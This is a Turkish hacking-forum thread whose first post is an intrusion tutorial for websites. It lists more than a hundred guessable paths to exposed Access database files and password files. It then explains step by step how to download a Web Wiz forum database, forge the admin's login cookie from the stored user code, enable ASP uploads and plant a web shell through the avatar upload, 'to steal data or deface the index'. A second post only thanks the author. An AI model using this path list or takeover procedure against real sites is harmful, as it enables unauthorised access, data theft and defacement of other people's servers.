İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

DB (database) bulma yolları

25-09-2006 02:59
#1
Üyelik tarihi:
09/2006
Nereden:
sur dibi :D
Mesajlar:
111
Teşekkür (Etti):
0
Teşekkür (Aldı):
6
Konular:
50
Ticaret:
(0) %
Bunları sitenin sonuna teker teker ekleyin deneyin

/db/main.mdb
/tools/snitz_forums_2000.mdb
/snitz_forums_2000.mdb
/admin/database/wwforum.mdb
/db/uyelik.mdb
/passwd.txt
/uyelik.mdb
/uyeler.mdb
/login.mdb
/enter.mdb
/giris.mdb
/sifreler.mdb
/member.mdb
/members.mdb
/samples.mdb
/wwforum.mdb
/genctr.mdb
/aforum.mdb
/forum.mdb
/private.mdb
/register.mdb
/.mdb
/db/snitz_forums_2000.mdb
/db/login.mdb
/db/forum.mdb
/db/genctr.mdb
/db/aforum.mdb
/db/enter.mdb
/db/giris.mdb
/db/forum.mdb
/db/uyelik.mdb
/db/uyeler.mdb
/db/private.mdb
/db/register.mdb
/db/.mdb
/db/sifreler.mdb
/db/member.mdb
/db/members.mdb
/db/samples.mdb
/db/wwforum.mdb
/db/tools/snitz_forums_2000.mdb
/admin/member.mdb
/admin/private.mdb
/admin/register.mdb
/admin/members.mdb
/admin/uyeler.mdb
/admin/sifreler.mdb
/admin/enter.mdb
/admin/giris.mdb
/admin/register.mdb
/admin/samples.mdb
/admin/private.mdb
/admin/mdb.mdb
/admin/forum.mdb
/admin/aforum.mdb
/admin/login.mdb
/admin/.mdb
/admin/database/wwforum.mdb
/admin/database/uyeler.mdb
/admin/database/sifreler.mdb
/admin/database/login.mdb
/admin/database/member.mdb
/admin/database/members.mdb
/admin/database/private.mdb
/admin/database/enter.mdb
/admin/database/giris.mdb
/admin/database/register.mdb
/admin/database/sevgi.mdb
/admin/database/samples.mdb
/admin/database/mbd.mdb
/admin/database/forum.mdb
/admin/database/aforum.mdb
/admin/database/.mdb
/admin/db/wwforum.mdb
/admin/db/uyeler.mdb
/admin/db/sifreler.mdb
/admin/db/login.mdb
/admin/db/member.mdb
/admin/db/members.mdb
/admin/db/private.mdb
/admin/db/register.mdb
/admin/db/enter.mdb
/admin/db/giris.mdb
/admin/db/samples.mdb
/admin/db/mdb.mdb
/admin/db/forum.mdb
/admin/db/aforum.mdb
/admin/db/.mdb
/skeetx/slog/login.mdb
/forum/db/main.mdb
/forum/tools/snitz_forums_2000.mdb
/forum/snitz_forums_2000.mdb
/forum/admin/wwforum.mdb
/forum/db/uyelik.mdb
/forum/passwd.txt
/forum/uyelik.mdb
/forum/uyeler.mdb
/forum/login.mdb
/forum/enter.mdb
/forum/giris.mdb
/forum/sifreler.mdb
/forum/member.mdb
/forum/members.mdb
/forum/samples.mdb
/forum/wwforum.mdb
/forum/genctr.mdb
/forum/private.mdb
/forum/register.mdb
/forum/aforum.mdb
/forum/forum.mdb
/forum/.mdb
/forum/db/snitz_forums_2000.mdb
/forum/db/login.mdb
/forum/db/forum.mdb
/forum/db/genctr.mdb
/forum/db/aforum.mdb
/forum/db/forum.mdb
/forum/db/enter.mdb
/forum/db/giris.mdb
/forum/db/uyelik.mdb
/forum/db/uyeler.mdb
/forum/db/private.mdb
/forum/db/register.mdb
/forum/db/.mdb
/forum/db/sifreler.mdb
/forum/db/member.mdb
/forum/db/members.mdb
/forum/db/samples.mdb
/forum/db/wwforum.mdb
/forum/db/tools/snitz_forums_2000.mdb
/forum/admin/member.mdb
/forum/admin/members.mdb
/forum/admin/uyeler.mdb
/forum/admin/sifreler.mdb
/forum/admin/enter.mdb
/forum/admin/giris.mdb
/forum/admin/register.mdb
/forum/admin/samples.mdb
/forum/admin/private.mdb
/forum/admin/mdb.mdb
/forum/admin/forum.mdb
/forum/admin/aforum.mdb
/forum/admin/login.mdb
/forum/admin/.mdb
/forum/admin/database/wwforum.mdb
/forum/admin/database/uyeler.mdb
/forum/admin/database/sifreler.mdb
/forum/admin/database/login.mdb
/forum/admin/database/member.mdb
/forum/admin/database/enter.mdb
/forum/admin/database/giris.mdb
/forum/admin/database/members.mdb
/forum/admin/database/private.mdb
/forum/admin/database/register.mdb
/forum/admin/database/sevgi.mdb
/forum/admin/database/samples.mdb
/forum/admin/database/mbd.mdb
/forum/admin/database/forum.mdb
/forum/admin/database/aforum.mdb
/forum/admin/database/.mdb
/forum/admin/db/wwforum.mdb
/forum/admin/db/uyeler.mdb
/forum/admin/db/sifreler.mdb
/forum/admin/db/login.mdb
/forum/admin/db/member.mdb
/forum/admin/db/members.mdb
/forum/admin/db/enter.mdb
/forum/admin/db/giris.mdb
/forum/admin/db/private.mdb
/forum/admin/db/register.mdb
/forum/admin/db/samples.mdb
/forum/admin/db/mdb.mdb
/forum/admin/db/forum.mdb
/forum/admin/db/aforum.mdb
/forum/admin/db/.mdb

Bildiğimiz gibi webwiz veritabanlarındaki parolalar şifrelenmiş biçimdeler ve veritabanını ele geçirsek bile hiç bir anlamı kalmıyordu.. Ama bu yazıyı okuyup bitirdiğinizde bu sorunu aşıp nasıl bir sitenin hacklenebileceğini göreceksiniz.. Öncelikle Cookieeditor isimli programı download edip kuruyoruz.. Bu program çerezleri düzenliyebilmemizi sağlıyor..
Evet programı kurduktan sonra webwiz forum kullanan bir site buluyoruz... Daha sonra sitenin sonuna /admin/database/wwForum.mdb yazıyoruz. Eğer şansınız varsa veritabanını indiriyoruz..
microsoft access le açalım bunu
Daha sonra çerez düzenliyicimizden sitenin adresini yazıyoruz ve WWF adlı webwiz çerezini buluyoruz.. Evet düzenlemek için açın şöyle bir yazı olacak: LTVST=38382%2E7898032407 Bu yazıyı silip yerine veritabanındaki tblAuthor adlı tablodan adminin user_codesini alıyoruz.. User_Code beni hatırla seçeneği işaretlendiği zaman kullanıcıyı tekrar tanımak için kullanılan koddur.. Üye her giriş yaptığı zaman bu kod otomatik olarak güncellenir ve belirli bir algoritması yoktur . Bu yüzden her forum kullanan sitede işe yaramaz.. Neyse devam edelim adminin user codesini kopyalayın ve yapıştırmadan önce UID= yazıp kopyalayın yoksa işe yaramaz.. Son durum olarak şöyle bir yazı olmalı: UID=admin8643E28649 .. Evet her şey güzel yalnız webwiz penceresi acıksa kapatın.. Sonra tekrar dan aynı adresi girip siteye bağlanın eğer hiçbir hata yapmadıysanız foruma admin olarak giriş yapmış olacaksınız.. Şifreyi bilmeden bağlandınız bu harika ... Evet admin olarak bağlandıysanız yukarıda Yönetici Bölümü / Admin yazısı çıkması lazım.. Evet çıkdıysa tıklayıp yönetici bölümüne geçiş yapın.. Evet solda general admin diye bir yer var .. Oraya geçip file and image... diye bir yazı var ona basıp upload etmeyi etkinleştirin yalnız orda dosya türlerine asp eklemeyide unutmayın.. Aktif hale getirdikten sonra my profile bölümüne gidin.. Orda simgenin altında simge yükle var. Oraya basıp elmalı şekerinizi rahatça upload edebilirsiniz. Upload ettikten sonra elmalı şekerimi nasıl bulacam diyorsanız %90 uploads adlı klasordedir. Eğer degilse profildeki gözükmeyen resimin adresine bakın o yükledigimiz dosya .. Ondan sonra site sizin. İster bilgi calın ister index atın ...
Kullanıcı İmzası
K.H.T (commander) M etamorphosis

Wep Security
Hacking & Security

( K.H.T - K.E.T ) -
( İ.P.C - İ.P.D )

İmaginary Power Kommandership
İmaginary Defence Kommandership

ABD Hacking & Security Team ( K.H.T - K.E.T ) - ( İ.P.C - İ.P.D )

16-08-2011 00:29
#2
IDeviL - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Mesajlar:
1
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Konular:
0
Ticaret:
(0) %
seLam ..
iLk Önce PayLasım İçin Teşekkürler.
Size Bi konuda Danışmak isterim.
Msn Adresim (Comeninn@hotmail.com)
EkLemenizi Rica Ederim.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı